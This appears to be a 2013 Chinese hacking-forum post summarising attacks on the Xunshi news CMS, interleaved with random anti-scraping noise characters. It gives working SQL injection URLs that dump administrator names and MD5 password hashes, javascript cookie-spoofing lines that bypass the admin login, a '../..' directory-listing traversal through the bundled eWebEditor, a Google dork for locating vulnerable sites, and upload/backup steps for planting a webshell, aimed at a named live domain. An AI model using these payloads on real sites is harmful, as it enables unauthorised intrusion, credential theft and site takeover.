中国网络渗透测试联盟
标题:
讯时漏洞总结
[打印本页]
作者:
admin
时间:
2013-1-16 21:25
标题:
讯时漏洞总结
by:血封忆尘
& P/ ~- G( ~9 K/ B
3 b& R v! n c+ e9 i4 s
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
. }8 d& a4 {, L5 K3 q9 N9 K5 H
* p* v9 \4 z9 n3 `
以下本文总结来自黑防去年第9期杂志上的内容...
9 @6 |) W. [ [* C6 r% d3 Y" b
) t/ F, Z* d ?/ d: M* A
先说一个注入吧:
http://www.political-security.com/news_more.asp?lm=2
%41nd 1=2 union %53elect 1,2,3,0x3b%
* Z3 Y: H; j1 S1 e
- o7 j I1 U/ U) u; z
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
% ?& ?0 G* n: {; |
6 m' O1 |6 ^ p% L" m( x
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
( K* Z! r( j5 v1 l, {
这里一个注入
* E$ U8 w6 T7 G# j0 ~% l/ d
$ D, y" @! L# A" b! J, p
效果如图:
+ p% G. V' g% ~7 Y: V) t
8 z% F% c- H; V8 N
8 O$ z" ^8 D+ o( q. k( `
" W( J7 a8 p. U
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
8 \; i6 A% o4 M: j
1 m# b/ b& Y0 D( r/ Q
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
& E( L" H* x" d
. d( u$ w! n7 y
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
5 Q/ E# u$ }! B( V$ v6 v
# j% N2 d8 \0 a$ }" g$ o
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
4 f, E% f! w; m% g6 u
$ s& P$ I& V( w, _+ ]
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
# Y* }+ {+ a% D, O; e
, H y8 p W7 G& Z: f8 ]
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
$ p; Q8 Z( q) ^9 g2 K/ e; a- Q6 m
3 @# @6 F8 L% c! |* m z* P7 x/ `
访问这页面来列目录..步骤如下:
4 M. |/ A/ p p" O% U2 O$ M) j# e
/ C9 M n; e6 \
javascript:alert(document.cookie="admindj=1")
' n/ g& T5 g0 S/ s
( X# \: n# a# i( W& T, L* x
http://www.political-security.co ... asp?id=46&dir=../..
j) y! i/ b" i& O7 P
. x" O2 |" Y( u! G$ h7 |' Y
效果如图:
" F+ ?. n4 \6 S9 G& U& w: x
" j+ g% n% F" ?! H
* _. o @7 i Y. V
, j* M+ C& G0 m7 I* @* I P+ n: ?
这样全站目录都能瞧了..找到后台目录..进去..
' J- `# A# F( _/ x
v# P' n" T9 W# I7 Y. H. d% E7 E
那么进了后台怎么拿shell??上传--备份就ok了..
8 V8 i' d; O1 P6 o
5 a1 N9 l7 q+ m! u1 Q e
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
5 Z7 K8 t9 o. w3 g' ]
4 s( j3 R+ V- u
这个我也碰到过一次..你都可以通过列目录来实现..
* V6 z- U: K) G( x; T: _
1 g( Q* k1 Q# y4 p
javascript:alert(document.cookie="admindj=1")
- z) d; x$ [, e3 L
( N* @* x5 W. Q' A( N$ _
http://www.political-security.co ... p?action=BackupData
1 p3 m( P7 D: H, N
: i. e' W5 J+ [# q. O
备份ok..
+ g5 n2 i! a- G9 d4 C% h6 l8 k+ s
$ ~2 ~; G3 t% b! ?1 F
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
% K5 u, ^. v7 |( n
! O9 ~. F! n$ ?# x; W5 x# E
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
+ M" {0 _7 \+ s
, V! D% W4 I5 }
然后访问此页面进行注入..步骤如下:
. F! a1 D7 T! a* X
3 m9 ^7 f6 K) z
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
4 L3 B Y7 ^( a/ c# e
5 ^% C* j7 U3 g: n8 a
然后请求admin/admin_chk.asp页面
) [8 T: m0 F, x+ R& i
+ q; {$ x& a3 V# l# B
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
) K; I6 q i4 L' t
8 p# T+ i" G2 ]$ F
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
8 u) B, W# z) A6 v, i/ o) E1 z, I! |7 U
" V4 g; ^" b# E2 v+ @
效果如图所示:
3 x: ^: \1 p0 Z# A* ?
0 U/ B O9 a @9 A
* ]% C8 m* b6 ]
u; Y9 Z% F* O$ p( ?
讯时漏洞2
$ ]7 |' k* Z. r+ E# S
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
" O% c: r* c' S; u a$ U
6 e6 \; N! d B) H0 R
1、/admin/admin_news_pl_view.asp?id=1
$ T2 S. h& @6 d1 @
//id任意 填入以下语句
5 E: J! `4 m, Z
7 L( D3 m0 l8 t! W9 I
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
9 y5 |* b" T! Q0 S
9 b' s/ H) C$ ?/ p$ F4 h* P
# B. ^* Z3 C& S0 g' d
* C* e* H2 R+ S. V
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
* ], q" P$ w$ X. {) Y; T
. z# z; I6 ^; B) Z7 Y. R9 t7 }
' {, `9 P N2 R4 V6 L$ L* X( @$ C9 \; N
( U9 e' |" U# O4 N. c
爆出管理员帐号和密码了
2 J& y4 M3 V, a. E5 A2 B* H
B5 L) R/ V( O0 b
: E6 e& x4 H* j! A
% `$ h8 U. P: Z) C" i, g
4、cookies进后台
- F. @' L$ H( x, R* Q- h. q
( e( `$ s& S- k) q' o
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
5 r( q W& ?4 E& b1 u4 U
$ X s5 s1 q0 P
6 R7 b, i% d: j! E0 F
7 s% D3 S' s/ ?1 P0 G1 i
5、后台用了cookie验证,直接访问
http://www.political-security.com/admin/admin_index.asp
就OK了!
" _7 I5 `) g/ {" t
( l3 R. C2 j; _: ]
7 d+ a) g# I1 y/ o9 x
- G# Y f/ K. e2 `# n
6、后台有上传和备份取SHELL不难。
; |" G# c7 U( d& B3 Y
g7 C: p9 ~) h" {, ?
7、讯时还有个列目录漏洞:
http://www.political-security.co ... asp?id=46&dir=../..
& [) O" S: u9 C4 |% N( {
6 |6 b) s" L* U$ K
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问
http://www.political-security.com
/admin/admin_db_backup.asp?action=BackupData
,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
3 c1 x2 F6 } j/ p
. N) `$ K2 f9 }6 G
* a% V; ^& F* p5 X, o! W
5 d- r4 N" b# n. _' F1 K
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2